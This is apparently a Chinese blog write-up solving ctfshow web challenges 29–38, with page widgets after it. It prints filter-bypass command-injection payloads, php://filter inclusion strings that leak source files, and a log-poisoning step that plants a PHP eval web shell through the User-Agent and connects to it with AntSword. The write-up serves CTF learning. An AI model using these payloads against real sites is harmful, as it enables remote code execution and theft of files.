ctfshow web入门 web29-web38

web29

把flag和i屏蔽了

system函数也行但是通常会屏蔽所以我直接用passthru

看看有啥

cat的话要查看源代码

web30

没有意外把这个system屏蔽了没事我不用哈哈哈

?c=passthru("cat f*");

然后查看源代码

web31

把空格屏蔽了

某位大佬的题解看到的

%09或者/**/绕过

但是是在""里面所以我们还是直接%09吧

web32

php伪协议,最常用的两种命令

php://filter/read=convert.base64-encode/resource=index.php
php://filter/resource=index.php

查看文件内容(源代码)

构造

?c=include$_GET["cmd"]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php

这里放两张我和大佬聊天的截图,真的很无语

加个http://

移动到最后发现有等号,base64解码

web33

双引号屏蔽了我不用就是了把刚才那个改一下

?c=include$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php

web34

怎么看着和web33的一模一样

?c=include$_GET[1]?>&1=php://filter/read=convert.base64-encode/resource=flag.php

可以用

base64解码

web35

说实话不认真比对真的看不出来有啥区别,这次多了一个等号

?c=include$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php

但是我抱着试一试的情况把他做出来了

web36

屏蔽了数字

但是我的payload根本就没有数字哇,继续用,都已经是套娃了家人们

?c=include$_GET[cmd]?>&cmd=php://filter/read=convert.base64-encode/resource=flag.php

得吃php伪协议

web37

日志文件包含

思路:include文件包含,利用日志文件包含

?c=/var/log/nginx/access.log   (访问日志文件

打开hackbar,

user agent传马

<?php eval($_POST['a']);?>

antsword链接

到手,之前做过日志文件包含所以我看到自己的题解找到的这个"?c=/var/log/nginx/access.log"

就是方便

web38

一样的做法,一个不用的步骤都没有,中途操作有问题的评论或者私聊帮你解决
 

  • 14
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值